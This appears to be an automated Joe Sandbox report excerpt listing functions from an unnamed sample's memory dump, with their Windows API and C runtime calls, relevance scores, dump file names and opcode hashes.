                                                                                                                                                                  • Opcode ID: d973f2b043921ce4c156749366af12e9a925325d3215c3f29c049959870ba7cb
                                                                                                                                                                  • Instruction ID: 391f82ad01897e6032ea899d4f2ad98abfd93d8c6431b345884497679c69bda2
                                                                                                                                                                  • Opcode Fuzzy Hash: d973f2b043921ce4c156749366af12e9a925325d3215c3f29c049959870ba7cb
                                                                                                                                                                  • Instruction Fuzzy Hash: F511D636210315BFDB259F74E855D7A77B4FF45350B40802AF806CB254EB71987187A1
                                                                                                                                                                  Function 00213D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _free.LIBCMT ref: 00213D65
                                                                                                                                                                    • Part of subcall function 002045EC: __FF_MSGBANNER.LIBCMT ref: 00204603
                                                                                                                                                                    • Part of subcall function 002045EC: __NMSG_WRITE.LIBCMT ref: 0020460A
                                                                                                                                                                    • Part of subcall function 002045EC: RtlAllocateHeap.NTDLL(00D80000,00000000,00000001), ref: 0020462F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 614378929-0
                                                                                                                                                                  • Opcode ID: 0958772c551aeaca1fd69b4cedc40440f29afccecb0e027ed8942112a98d0e95
                                                                                                                                                                  • Instruction ID: 7b80e32fb6fa46d6577affb0eed400c95c5e3459ad99b5af0268c393eaedce5d
                                                                                                                                                                  • Opcode Fuzzy Hash: 0958772c551aeaca1fd69b4cedc40440f29afccecb0e027ed8942112a98d0e95
                                                                                                                                                                  • Instruction Fuzzy Hash: 6411E7329203169BDB317F74BC486DB3BD96F21360B508565F9888A1D2DF7089F0CE50
                                                                                                                                                                  Function 002213D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002213EE
                                                                                                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00221409
                                                                                                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0022141F
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00221474
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3137044355-0
                                                                                                                                                                  • Opcode ID: b4a2e0e73c7378ce585fe4a635468111c63c778d376aad06edea14e0583fabcd
                                                                                                                                                                  • Instruction ID: 2ba86a16c3ae2c33a97b61929c0a7f8e8226d4d708a775cbb3ae5f055163af0d
                                                                                                                                                                  • Opcode Fuzzy Hash: b4a2e0e73c7378ce585fe4a635468111c63c778d376aad06edea14e0583fabcd
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C219071A1025DBBDB20AFD1EC88EDABBB8EF10700F408469E51A97110D7B0EA34DF51
                                                                                                                                                                  Function 0021C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0021C285
                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0021C297
                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0021C2AD
                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0021C2C8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                  • Opcode ID: ba418a677ac8f24fd34c24fa63bb8de4b42217ba8fbcde34b7b90a6c51762e6b
                                                                                                                                                                  • Instruction ID: 1dac85b6abbbacfd11cc73ee2e4dac47ccea2f04690692c3914ae5607091f58c
                                                                                                                                                                  • Opcode Fuzzy Hash: ba418a677ac8f24fd34c24fa63bb8de4b42217ba8fbcde34b7b90a6c51762e6b
                                                                                                                                                                  • Instruction Fuzzy Hash: BA11187A940218FFDB11DFE8C885EDDBBB8FB18710F204091EA05B7294D671AE50DB94
                                                                                                                                                                  Function 00227C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00227C6C
                                                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00227C9F
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00227CB5
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00227CBC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2880819207-0
                                                                                                                                                                  • Opcode ID: 8ed2558259912121517db547e6f6bcdc42b767840ca55d0568c76a383f7d9a19
                                                                                                                                                                  • Instruction ID: 5b7bb74eabdc76ef71efc3ecb602e41c62b32f58381293297854d4846c25a36c
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed2558259912121517db547e6f6bcdc42b767840ca55d0568c76a383f7d9a19
                                                                                                                                                                  • Instruction Fuzzy Hash: 45110872B18358BBC711DFB8FC0CA9A7FAD9B0A324F144256F415D3291DAB089148760
                                                                                                                                                                  Function 001FC619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001FC657
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 001FC66B
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 001FC675
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3970641297-0
                                                                                                                                                                  • Opcode ID: daeca18a607f113ef7c9a77ff08362877470050ac0a8acc5b9256d549ebe361d
                                                                                                                                                                  • Instruction ID: 3b13ce3e0466c558b95338e8c25d37808b3024863f06959b9540b6d25bc6c0a8
                                                                                                                                                                  • Opcode Fuzzy Hash: daeca18a607f113ef7c9a77ff08362877470050ac0a8acc5b9256d549ebe361d
                                                                                                                                                                  • Instruction Fuzzy Hash: C9118EB250554CBFDF128FA0AD44EEABB69EF09364F054111FA0592150D771DC60ABA0
                                                                                                                                                                  Function 002249D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0022354D,?,002245D5,?,00008000), ref: 002249EE
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0022354D,?,002245D5,?,00008000), ref: 00224A13
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0022354D,?,002245D5,?,00008000), ref: 00224A1D
                                                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,0022354D,?,002245D5,?,00008000), ref: 00224A50
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2875609808-0
                                                                                                                                                                  • Opcode ID: 4f85c8b43a19017e8508be05635ef97d79a2c507c95e28caf95a973c5a7343f3
                                                                                                                                                                  • Instruction ID: 9aafe26b23c97f4d33c8280e5bfb3b0fd01c27c82bc911ebb4cb46e56d7ae78c
                                                                                                                                                                  • Opcode Fuzzy Hash: 4f85c8b43a19017e8508be05635ef97d79a2c507c95e28caf95a973c5a7343f3
                                                                                                                                                                  • Instruction Fuzzy Hash: AE115A31D5052DEBCF00AFE4EA59AEEBB78FF09701F414085E945B2140CB709560CBA9
                                                                                                                                                                  Function 00215BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                  • Instruction ID: cf3a910833b356e6e5af8b0915c37d9fa8f9cabd7393e7720bd8ec469e92becb
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                  • Instruction Fuzzy Hash: A6014E3202065EFBCF125E84DC45CEE3FA2BB68754B588455FE1859031D336CAB1AB81
                                                                                                                                                                  Function 002080E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0020869D: __getptd_noexit.LIBCMT ref: 0020869E
                                                                                                                                                                  • __lock.LIBCMT ref: 0020811F
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0020813C
                                                                                                                                                                  • _free.LIBCMT ref: 0020814F
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(00DAE828), ref: 00208167
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2704283638-0
                                                                                                                                                                  • Opcode ID: aeff1382555186d565edaeea6de29265f5e7c63e13d349b132639720381dd16a
                                                                                                                                                                  • Instruction ID: dd7ba04f70bdbbcb95b8853359c7a624c5ad94d7d16bdbdfcaa771859ddac404
                                                                                                                                                                  • Opcode Fuzzy Hash: aeff1382555186d565edaeea6de29265f5e7c63e13d349b132639720381dd16a
                                                                                                                                                                  • Instruction Fuzzy Hash: FE01A131D21712EBCB15AF24A80A76AB3A0BF44710F054046F858672D3CF746832CFD6
                                                                                                                                                                  Function 00208724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __lock.LIBCMT ref: 00208768
                                                                                                                                                                    • Part of subcall function 00208984: __mtinitlocknum.LIBCMT ref: 00208996
                                                                                                                                                                    • Part of subcall function 00208984: RtlEnterCriticalSection.NTDLL(00200127), ref: 002089AF
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(DC840F00), ref: 00208775
                                                                                                                                                                  • __lock.LIBCMT ref: 00208789
                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 002087A7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1687444384-0
                                                                                                                                                                  • Opcode ID: df20ffa5ee2aa5f14ece72571305a9cfcf79dafa5eac20e649b3d53c9e122cde
                                                                                                                                                                  • Instruction ID: 6b2844a37dd7a56f30f92932461f1dd6c155f27985f14e605a09886793af3931
                                                                                                                                                                  • Opcode Fuzzy Hash: df20ffa5ee2aa5f14ece72571305a9cfcf79dafa5eac20e649b3d53c9e122cde
                                                                                                                                                                  • Instruction Fuzzy Hash: DB015B75920B019FE720AF65D80975AF7E0BF40325F20890EE09A876E2DBB0A650CF05
                                                                                                                                                                  Function 00229C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00229C7F
                                                                                                                                                                    • Part of subcall function 0022AD14: _memset.LIBCMT ref: 0022AD49
                                                                                                                                                                  • _memmove.LIBCMT ref: 00229CA2
                                                                                                                                                                  • _memset.LIBCMT ref: 00229CAF
                                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00229CBF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 48991266-0
                                                                                                                                                                  • Opcode ID: 1adf7c2c3c7d411946557115efa5f9a036eaa8c6d543adb7a58ca5a1bfe25823
                                                                                                                                                                  • Instruction ID: 8ebe1be1d7bec9701615ccc4f64c5f6a18f3c186b27807430933d523b5b7624d
                                                                                                                                                                  • Opcode Fuzzy Hash: 1adf7c2c3c7d411946557115efa5f9a036eaa8c6d543adb7a58ca5a1bfe25823
                                                                                                                                                                  • Instruction Fuzzy Hash: A3F03076200114BBCB016F54EC85A59BB29EF49310B04C055FE085E217C771A825DFB5
                                                                                                                                                                  Function 0024E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 001FB5EB
                                                                                                                                                                    • Part of subcall function 001FB58B: SelectObject.GDI32(?,00000000), ref: 001FB5FA
                                                                                                                                                                    • Part of subcall function 001FB58B: BeginPath.GDI32(?), ref: 001FB611
                                                                                                                                                                    • Part of subcall function 001FB58B: SelectObject.GDI32(?,00000000), ref: 001FB63B
                                                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0024E860
                                                                                                                                                                  • LineTo.GDI32(00000000,?,?), ref: 0024E86D
                                                                                                                                                                  • EndPath.GDI32(00000000), ref: 0024E87D
                                                                                                                                                                  • StrokePath.GDI32(00000000), ref: 0024E88B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                                                  • Opcode ID: 4afa7873438ac82aa75b2958c94c972cd2c19975f576a5397fcef2d87de9e4af
                                                                                                                                                                  • Instruction ID: b7b994c3ea59afc5b17b47d5a55104153ce5c97748a19d58e73ace9e4efdcc33
                                                                                                                                                                  • Opcode Fuzzy Hash: 4afa7873438ac82aa75b2958c94c972cd2c19975f576a5397fcef2d87de9e4af
                                                                                                                                                                  • Instruction Fuzzy Hash: 85F05E3150525ABBEF165F54BC0DFCA3F99AF0A321F048141FA11210E187B99561CF95
                                                                                                                                                                  Function 0021D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0021D640
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0021D653
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0021D65A
                                                                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 0021D661
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
